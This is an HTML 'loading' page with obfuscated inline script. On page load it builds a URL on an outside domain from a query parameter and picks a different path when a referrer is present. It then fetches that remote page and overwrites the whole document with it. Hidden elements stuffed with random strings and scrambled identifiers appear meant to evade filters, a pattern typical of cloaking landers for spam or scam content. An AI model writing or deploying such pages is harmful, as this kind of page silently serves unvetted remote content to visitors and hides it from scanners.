<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .w86J6V {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .w86J6V .bgk2yGuSe {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .w86J6V .content {
            line-height: 50px;
            text-align: center
        }

        .w86J6V .img {
            width: 100%
        }

        .w86J6V .yyVoW2 {
            text-align: center
        }

        .w86J6V .yyVoW2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .w86J6V .yyVoW2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .w86J6V .yyVoW2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .w86J6V .yyVoW2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .w86J6V .yyVoW2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .w86J6V .yyVoW2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .w86J6V .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rsJbejdRg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bOnwqlV = rsJbejdRg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bOnwqlV +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bOnwqlV +".html?a=share";
		}
		
        Npfu1DZLkc=url+"#"+new Date().getTime();
        Npfu1DZLkc && function() {
            $.get(Npfu1DZLkc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >B82ks3IaM87HvUpSthXI02d7exDlHH0HETHLjOdRyFic3f5d0RHYRnwQd66l</h1>
<p  style='display:none'>znBksBKQ8xQKwZyjINH5JkrC6Yxi1bXrD9H7nRR2WnXwRNKS8bjLjsRKYbV</p>
<ul style='display:none' >ExU7Tq000zb2mCytq4hnATbgsArbLmKrDGa2vop0Z3IWZ09AkXlN9euvH3vEwpzQfUdyr5oDJpmPcnycLfQ</ul>
<h1 style='display:none' >B82ks3IaM87HvUpSthXI02d7exDlHH0HETHLjOdRyFic3f5d0RHYRnwQd66l</h1><div class="w86J6V">
    <div class="bgk2yGuSe">
        <div class="yyVoW2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>bCUG0mLn4Y0foGz9DwELYaBbZnAFVNl8CEcirYYBtIK4PcHBBsUyl65Se2IgvRJpdGYFNbd5F3fiPyph1DImLsx</p>
<ul style='display:none' >vIDEdnSTIoULzPNlPLJjtO</ul>
<img  src='' style='display:none'>
<b style='display:none' >zBpiCdNqQUWNpF3zWNbLcS5Ax5SxrIw0TArj9rQce92lHM</b>
<li style='display:none' >qJgb8uIyjPZc5Qfh3FMzV6JlPlEV1zwtZKGTwKYjCFT7S7BLRDB7oRwhAJa</li>
<p  style='display:none'>bCUG0mLn4Y0foGz9DwELYaBbZnAFVNl8CEcirYYBtIK4PcHBBsUyl65Se2IgvRJpdGYFNbd5F3fiPyph1DImLsx</p></body>
</html>